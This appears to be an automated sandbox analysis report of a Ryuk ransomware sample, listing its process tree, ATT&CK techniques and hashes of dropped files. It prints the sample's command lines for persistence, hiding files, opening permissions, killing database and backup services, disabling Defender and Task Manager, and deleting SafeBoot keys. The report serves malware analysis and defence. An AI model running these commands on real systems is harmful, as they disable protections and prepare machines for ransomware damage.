PID 4116 wrote to memory of 1188	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	106
PID 4116 wrote to memory of 1188	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	106
PID 3580 wrote to memory of 3380	3580	cmd.exe	107
PID 3580 wrote to memory of 3380	3580	cmd.exe	107
PID 4116 wrote to memory of 2304	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	108
PID 4116 wrote to memory of 2304	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	108
PID 4116 wrote to memory of 4964	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	109
PID 4116 wrote to memory of 4964	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	109
PID 4116 wrote to memory of 3504	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	110
PID 4116 wrote to memory of 3504	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	110
PID 4116 wrote to memory of 1048	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	111
PID 4116 wrote to memory of 1048	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	111
PID 4116 wrote to memory of 1904	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	112
PID 4116 wrote to memory of 1904	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	112
PID 1904 wrote to memory of 4960	1904	cmd.exe	113
PID 1904 wrote to memory of 4960	1904	cmd.exe	113

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4944	attrib.exe
1780	attrib.exe
1748	attrib.exe

C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
"C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:920
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:1780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3552
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1384
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:3464
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:408
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:2428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
b01925eb79aff868999d7be561726324

SHA1
b005a53561fa9014d5c7cb0bf3957dfa57a7bada

SHA256
b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351

SHA512
f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
fdb92b73b4370f248e57b5292cb4b507

SHA1
5d86a3818e4c38d4821372900f21f8ec62d97efc

SHA256
40f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477

SHA512
76b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
b01925eb79aff868999d7be561726324

SHA1
b005a53561fa9014d5c7cb0bf3957dfa57a7bada

SHA256
b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351

SHA512
f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit